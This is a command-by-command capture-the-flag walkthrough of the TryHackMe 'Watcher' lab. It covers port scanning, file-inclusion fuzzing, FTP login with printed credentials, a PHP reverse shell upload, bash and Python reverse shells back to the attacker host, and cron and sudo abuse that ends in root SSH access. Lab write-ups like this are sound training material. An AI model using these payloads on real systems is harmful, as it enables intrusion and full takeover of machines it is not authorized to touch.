Watcher
Room Link: https://tryhackme.com/room/watcher
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w SecLists/Discovery/Web-Content/SVNDigger/cat/Language/php.txt
cat results.txt | grep -v 2422
I used my wordlist of common found on LFI / RFI and confirmed I can view files on the server. I did not find anything useful
Kali
ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w mylist.txt
cat results.txt | grep -v 2422
I remembered we had that secret file as well, I was able to read it and it had some credentials for FTP.
TCP/21 - FTP
Kali
ftp $VICTIM
Username:ftpuser
Password: givemefiles777 
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
nc -lvnp 1234 Kali(ftp)
put php-reverse-shell.php
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgVictim
sudo -l
Lateral Movement - mat
Victim
cat /etc/crontab
cd /home/toby/jobs/
sudo -u toby rm -f cow.sh
sudo -u toby touch cow.sh
sudo -u toby chmod 777 cow.sh
echo '#!/bin/bash' > cow.sh
echo 'sh -i >& /dev/tcp/$KALI/1338 0>&1' >> cow.sh
Kali
nc -lvnp 1338
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgLateral Movement - will
Victim(mat)
sudo -l
Kali
nc -lvnp 4242Victim(mat)
cd /home/mat/scripts/
echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$KALI",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > cmd.py
sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgPrivilege Escalation
Victim(will)
cat /opt/backups/key.b64
Kali
chmod 600 id_rsa
ssh root@$VICTIM -i id_rsa 
Last updated